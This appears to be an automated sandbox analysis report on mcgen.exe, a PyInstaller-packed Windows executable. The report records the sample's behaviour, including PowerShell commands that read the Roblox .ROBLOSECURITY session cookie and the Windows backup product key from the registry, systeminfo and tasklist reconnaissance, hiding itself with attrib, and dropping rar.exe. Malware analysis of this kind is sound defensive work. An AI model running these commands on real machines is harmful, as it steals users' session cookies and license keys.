Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll

Source: C:\Windows\System32\tasklist.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: mcgen.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: mcgen.exe

Static file information: File size 8042981 > 1048576

Source: mcgen.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: mcgen.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: mcgen.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: mcgen.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: mcgen.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: mcgen.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: mcgen.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: mcgen.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: mcgen.exe, 00000002.00000002.2533004812.00007FFD93B77000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: mcgen.exe, 00000002.00000002.2533576482.00007FFD93FDA000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: mcgen.exe, 00000002.00000002.2536395323.00007FFDA33C5000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.pdbhP source: powershell.exe, 0000003E.00000002.2321464313.000001FC3F123000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: mcgen.exe, 00000000.00000003.2120621510.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2539430082.00007FFDAC064000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: mcgen.exe, 00000002.00000002.2533576482.00007FFD93F42000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: mcgen.exe, 00000000.00000003.2120621510.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2539430082.00007FFDAC064000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: mcgen.exe, mcgen.exe, 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: mcgen.exe, mcgen.exe, 00000002.00000002.2533576482.00007FFD93FDA000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.pdb source: powershell.exe, 0000003E.00000002.2321464313.000001FC3F123000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000067.00000000.2410225338.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: mcgen.exe, 00000002.00000002.2538780635.00007FFDA5491000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: mcgen.exe, 00000002.00000002.2537613494.00007FFDA34F1000.00000040.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: mcgen.exe, 00000002.00000002.2537894188.00007FFDA3A81000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: mcgen.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: mcgen.exe, 00000002.00000002.2537371109.00007FFDA349B000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: mcgen.exe, 00000002.00000002.2538594297.00007FFDA4DA1000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: mcgen.exe, 00000002.00000002.2537371109.00007FFDA349B000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: mcgen.exe, 00000002.00000002.2538398509.00007FFDA4161000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: mcgen.exe, 00000002.00000002.2538121541.00007FFDA3AE1000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: mcgen.exe, 00000002.00000002.2537138652.00007FFDA3451000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python313.pdb source: mcgen.exe, 00000002.00000002.2535253168.00007FFD94659000.00000040.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: mcgen.exe, mcgen.exe, 00000002.00000002.2536395323.00007FFDA33C5000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: mcgen.exe, 00000002.00000002.2536860815.00007FFDA3411000.00000040.00000001.01000000.0000000E.sdmp

Source: mcgen.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: mcgen.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: mcgen.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: mcgen.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: mcgen.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: VCRUNTIME140.dll.0.dr

Static PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline"

Source: C:\Users\user\Desktop\mcgen.exe

Code function: 2_2_00007FFD948A5DD0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

2_2_00007FFD948A5DD0

Source: ppw2wipr.dll.67.dr	Static PE information: real checksum: 0x0 should be: 0x10ca3
Source: python313.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x1c507d
Source: _ctypes.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x12948
Source: unicodedata.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x4f800
Source: _bz2.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x1aa93
Source: mcgen.exe	Static PE information: real checksum: 0x7b1fca should be: 0x7aed9b
Source: libffi-8.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0xa1d1
Source: _ssl.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x172ba
Source: sqlite3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0xae9be
Source: libcrypto-3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x197f77
Source: _queue.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0xb09a
Source: _socket.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x14770
Source: _decimal.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x26383
Source: _hashlib.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x18eb4
Source: libssl-3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x4330c
Source: select.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x8e73
Source: _lzma.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x1cde8
Source: _sqlite3.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x11179

Source: libffi-8.dll.0.dr	Static PE information: section name: UPX2
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD32BDD2A5 pushad ; iretd	11_2_00007FFD32BDD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD32CF00BD pushad ; iretd	11_2_00007FFD32CF00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD32CF862B push ebx; ret	11_2_00007FFD32CF86CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD32CF861B push ebx; ret	11_2_00007FFD32CF862A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 62_2_00007FFD32D000BD pushad ; iretd	62_2_00007FFD32D000C1

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Found pyInstaller with non standard icon

Source: C:\Users\user\Desktop\mcgen.exe

Process created: "C:\Users\user\Desktop\mcgen.exe"

Uses attrib.exe to hide files

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\mcgen.exe"

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe

Source: C:\Users\user\Desktop\mcgen.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32122\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32122\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32122\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32122\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32122\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32122\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32122\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32122\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.dll	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32122\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32122\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32122\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32122\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32122\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32122\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32122\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32122\python313.dll	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI32122\_bz2.pyd	Jump to dropped file

